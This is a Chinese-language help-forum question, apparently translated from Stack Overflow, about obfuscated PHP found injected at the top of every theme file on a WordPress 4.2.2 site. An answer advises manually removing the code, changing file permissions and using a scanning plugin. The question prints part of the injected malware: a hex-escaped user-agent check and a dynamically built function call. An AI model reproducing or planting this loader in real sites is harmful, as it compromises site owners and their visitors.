我在所有主题文件的顶部发现了以下内容。我的本地副本没有!
WordPress v4。2.2在Linux服务器上运行。插件:高级自定义字段
<?php if(!isset($GLOBALS["\\x61\\156\\x75\\156\\x61"])) {$ua=strtolower($_SERVER["\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54"]); if ((! strstr($ua,"\\x6d\\163\\x69\\145")) and (! strstr($ua,"\\x72\\166\\x3a\\61\\x31"))) $GLOBALS["\\x61\\156\\x75\\156\\x61"]=1; } ?><?php $jobconrfpf = \'5c%x78257-MSV,6<*)ujojR%x5c%x7b\\40\\x2f\\52\\x20\\153\\x6a\\145\\x62\\161\\x61\\165\\x67\\160\\x68\\40\\x2a\\57\\x20"; $ournfmcogg=substr($jobconrfpf,(42613-32500),(69-57)); $ournfmcogg($xqycebdlqb, $pvjekxgoli, NULL); $ournfmcogg=$pvjekxgoli; $ournfmcogg=(464-343); $jobconrfpf=$ournfmcogg-1; ?>
我说个不停。我不想把所有的东西都贴在这里。
你知道这是从哪里来的吗?提前感谢您的帮助。
最合适的回答,由SO网友:daniyalahmad 整理而成
对这是一个恶意代码-如果您没有任何备份。我建议您手动从每个文件的顶部删除此代码。没有“Genire”插件/脚本可以安全地从您的每个文件中删除它。如果您擅长PHP,可以编写自己的脚本。
按照以下步骤确保所有安全:
从每个文件中删除所有恶意代码更改文件权限https://wordpress.org/plugins/gotmls/
